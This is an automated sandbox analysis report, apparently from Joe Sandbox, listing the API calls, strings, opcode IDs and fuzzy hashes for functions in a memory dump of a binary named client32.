Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcess_calloc_freewsprintf
String ID: CLTCONN.CPP
API String ID: 183652615-2872349640
Opcode ID: 8337f5e747ebaeb2686f90dd4bebe07236585bab06edcc3415c76220b6505581
Instruction ID: 20d7259e8fe77d3daff0af84d5ff1d15e913130fc2269d1c6afd747bd8efee53
Opcode Fuzzy Hash: 8337f5e747ebaeb2686f90dd4bebe07236585bab06edcc3415c76220b6505581
Instruction Fuzzy Hash: F231C875A10B069AD310CF95C881BB7F3E4FF44318F048669E9598B641F774F905C3A5

Function 1108F720 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

std::exception::exception.LIBCMT ref: 1108F7BC
__CxxThrowException@8.LIBCMT ref: 1108F7D1

Strings

L, xrefs: 1108F805

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
String ID: L
API String ID: 1338273076-2909332022
Opcode ID: 95ac659df3cb43b7a394a31561a0db95ca543259b56f7bb8d276c069331ce165
Instruction ID: 369f405687447c84649efdd58832c02068d177a3a0274ca2d5cff2ffa4839110
Opcode Fuzzy Hash: 95ac659df3cb43b7a394a31561a0db95ca543259b56f7bb8d276c069331ce165
Instruction Fuzzy Hash: 9F3160B5D04259AEEB11DFA4C840BDEFBF8FB08314F14426EE915A7280D775A904CBA1

Function 11147850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32(00000400,?,00000000,00000000,00000010,00000401,?,?,750A94D8,00000010), ref: 111478DB
wvsprintfA.USER32(00000010,?,?), ref: 111478F2

Strings

ERROR TOO LONG: fmt_string=<%s>, s=<%.80s>, xrefs: 1114790A

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FormatMessagewvsprintf
String ID: ERROR TOO LONG: fmt_string=<%s>, s=<%.80s>
API String ID: 65494530-3330918973
Opcode ID: 84ff1f22b3e63b30bcd43db78ed2a3d83fe9186dadbe20577e5398af88fbbc10
Instruction ID: 19ecc3acc586c3c0044aa7ac842438cb7b35c94f742bf7000cc937f5be2b0cb7
Opcode Fuzzy Hash: 84ff1f22b3e63b30bcd43db78ed2a3d83fe9186dadbe20577e5398af88fbbc10
Instruction Fuzzy Hash: 3E21B6B5D0026DAEEB10CF90DC81FEAFBBCEB44618F104169E61993640E7756E44CBE5

Function 110AD1B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 110AD1E3

Part of subcall function 110ACEB0: LoadLibraryA.KERNEL32(Winscard.dll), ref: 110ACEC4
Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(00000000,SCardEstablishContext,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACEE1
Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardReleaseContext,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACEEE
Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardIsValidContext,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACEFC
Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardListReadersA,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACF0A
Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardGetStatusChangeA,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACF18
Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardCancel,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACF26
Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardFreeMemory,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACF34
Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardConnectA,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACF42
Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardDisconnect,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACF50
Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardGetAttrib,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACF5E
Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardControl,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACF6C
Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardListCardsA,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACF7A
Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardGetCardTypeProviderNameA,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACF88
Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardBeginTransaction,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACF96
Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardEndTransaction,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACFA4
Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardReconnect,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACFB2

FreeLibrary.KERNEL32(00000000,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?,?), ref: 110AD252

Strings

winscard.dll is NOT valid!!!, xrefs: 110AD1FD

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$FreeLoad_memset
String ID: winscard.dll is NOT valid!!!
API String ID: 212038770-1939809930
Opcode ID: 2490663d4c0d4ec01f8a7efd0df3ebe9692d3296733f7b5ae7fba3cdb2ac2a80
Instruction ID: 57730f506c13caa9e6db9d6f73070caca170ae8d01d94efb838e03e2302413b1
Opcode Fuzzy Hash: 2490663d4c0d4ec01f8a7efd0df3ebe9692d3296733f7b5ae7fba3cdb2ac2a80
Instruction Fuzzy Hash: 6521B3B6D40629ABDB10CF95DC44EEFFBB8EB45660F00861AFC15A3340D631A904CBE0

Function 1100F2A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 1100F2BB

Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4

std::_Xinvalid_argument.LIBCPMT ref: 1100F2D2

Strings

string too long, xrefs: 1100F2B6, 1100F2CD

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
String ID: string too long
API String ID: 963545896-2556327735
Opcode ID: 75f838df1ffa959431b4a62d365d349d8fd4399dcfd8cc9140359aaa01b8e6d6
Instruction ID: 9c03118c2fef7a30d7f16138fb3dcb5344bdbe7bcaefeaa8633fdbb4ef9eb1a5
Opcode Fuzzy Hash: 75f838df1ffa959431b4a62d365d349d8fd4399dcfd8cc9140359aaa01b8e6d6
Instruction Fuzzy Hash: E711E9737006148FF321D95DA880BAAF7EDEF957B4F60065FE591CB640C7A1A80083A1

Function 110232A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

GetDlgItemTextA.USER32 ref: 110232D7
SetDlgItemTextA.USER32(?,?,?), ref: 1102335F

Strings

..., xrefs: 1102331A

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ItemText
String ID: ...
API String ID: 3367045223-440645147
Opcode ID: 3c7fd1be2824b6022330b2e6fcbe42859dc36aafcf172dfa7595ecaab8fe21c6
Instruction ID: 288fafb08c6b2ba60c27d59f26b93e6fc9d809d534a4309207b318a271e26125
Opcode Fuzzy Hash: 3c7fd1be2824b6022330b2e6fcbe42859dc36aafcf172dfa7595ecaab8fe21c6
Instruction Fuzzy Hash: 1121A2756046199BCB24CF68C880FEAF7F9AF99304F1081D9E58997240DAB0AD85CF90

Function 110B9730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

ShowWindow.USER32(8D111949,00000009), ref: 110B977B

Part of subcall function 110B8AC0: GetSystemMetrics.USER32(0000004C,?,?,?,?,?,?,?,?,?,?,?,?,110BA757,00000001,?), ref: 110B8AF2
Part of subcall function 110B8AC0: GetSystemMetrics.USER32(0000004D,?,?,?,?,?,?,?,?,?,?,110BA757,00000001,?,00000000), ref: 110B8AF9
Part of subcall function 110B8AC0: GetSystemMetrics.USER32(0000004E,?,?,?,?,?,?,?,?,?,?,110BA757,00000001,?,00000000), ref: 110B8B00
Part of subcall function 110B8AC0: GetSystemMetrics.USER32(0000004F,?,?,?,?,?,?,?,?,?,?,110BA757,00000001,?,00000000), ref: 110B8B07
Part of subcall function 110B8AC0: SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 110B8B16
Part of subcall function 110B8AC0: GetSystemMetrics.USER32(?,?,?,?,?,?,?,?,?,?,?,110BA757,00000001,?,00000000), ref: 110B8B24
Part of subcall function 110B8AC0: GetSystemMetrics.USER32(00000001), ref: 110B8B33

MoveWindow.USER32(8D111949,?,?,?,?,00000001), ref: 110B97A3

Strings

j CB::OnRemoteSizeRestore(%d, %d, %d, %d), xrefs: 110B97BD

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: System$Metrics$Window$InfoMoveParametersShow
String ID: j CB::OnRemoteSizeRestore(%d, %d, %d, %d)
API String ID: 2940908497-693965840
Opcode ID: 60bc414364147a50c916ce8f7c8964549782f9578ddb51fb58b5c7b9b217b13c
Instruction ID: 55e82b17da46594b085dc316db9a602337c46ecd43c839d0c1f018f75bd6c70b
Opcode Fuzzy Hash: 60bc414364147a50c916ce8f7c8964549782f9578ddb51fb58b5c7b9b217b13c
Instruction Fuzzy Hash: DA21E875B0060AAFDB08DFA8C995DBEF7B5FB88304F104268E519A7354DB30AD41CBA4

Function 11145990 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsA.KERNEL32(000000FF,?,00000104,000000FF), ref: 111459B7
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 111459F6

Strings

:, xrefs: 111459CB

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandFileModuleNameStrings
String ID: :
API String ID: 2034136378-336475711
Opcode ID: 1879a18607367a7fe0ec9fcc5ca715ca320c192212d283e296261fc87c6dfa09
Instruction ID: 2f025fe159ad018ca32f107a988c6b97e10c7b7f69d8ea9c63f353a653f43b24
Opcode Fuzzy Hash: 1879a18607367a7fe0ec9fcc5ca715ca320c192212d283e296261fc87c6dfa09
Instruction Fuzzy Hash: 65213738C043599FDB21CF64CC44FD9BB68AF16708F6041D4D59967942EF706A8DCBA1

Function 11043760 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65threadCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32(?,?), ref: 11043784
GetClassNameA.USER32(?,?,00000040), ref: 11043799

Strings

tooltips_class32, xrefs: 110437A3

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ClassNameProcessThreadWindow
String ID: tooltips_class32
API String ID: 2910564809-1918224756
Opcode ID: 6d3c4fdc3a6f6e7596f8af0fff3375ada305fabf060d9fd927d6679c10a610bf
Instruction ID: 7b66b5eeeba6873e3bd91d5637fb3b576f23a09c5117b8e426f31f0334ec312d
Opcode Fuzzy Hash: 6d3c4fdc3a6f6e7596f8af0fff3375ada305fabf060d9fd927d6679c10a610bf
Instruction Fuzzy Hash: DF112B71A080599BD711DF74C880AEDFBB9FF55224F6051E9DC819FA40EB71A906C790

Function 110391C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276

Part of subcall function 110CB9E0: GetDlgItemTextA.USER32 ref: 110CBA0C
Part of subcall function 110CB9E0: SetDlgItemTextA.USER32(?,?,00000000), ref: 110CBA30

SetDlgItemTextA.USER32(?,000004BC,?), ref: 11039202
_memset.LIBCMT ref: 11039216

Strings

506013, xrefs: 1103922B

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ItemText$Window$ObjectRectShow_memset
String ID: 506013
API String ID: 3037201586-3438455666
Opcode ID: 2bc1dfb5218c02c431ab83e71b2dcb76f085101561c9e5be1cea2ac4dddf3c12
Instruction ID: 4133adfa845279c2267cfda8ab6a139ff56e83a68c49f32f67e71b8829282469
Opcode Fuzzy Hash: 2bc1dfb5218c02c431ab83e71b2dcb76f085101561c9e5be1cea2ac4dddf3c12
Instruction Fuzzy Hash: E5119675740614AFE720DB68CC81FDAB7E8EF48704F004588F6089B280DBB1FA41CB95

Function 110ED5D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32 ref: 110ED600

Part of subcall function 110ED2B0: wvsprintfA.USER32(?,00020019,?), ref: 110ED2DB

Strings

Error %d getting %s, xrefs: 110ED614
(, xrefs: 110ED5F9

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: QueryValuewvsprintf
String ID: ($Error %d getting %s
API String ID: 141982866-3697087921
Opcode ID: ca51b0748ce67095b74e5d633593de675965d03fe984162ec59bedaca66226cf
Instruction ID: 957b37bb43794c395efd3ecf64b5ca03ad7d4ce898e6801f907036c689cda8f8
Opcode Fuzzy Hash: ca51b0748ce67095b74e5d633593de675965d03fe984162ec59bedaca66226cf
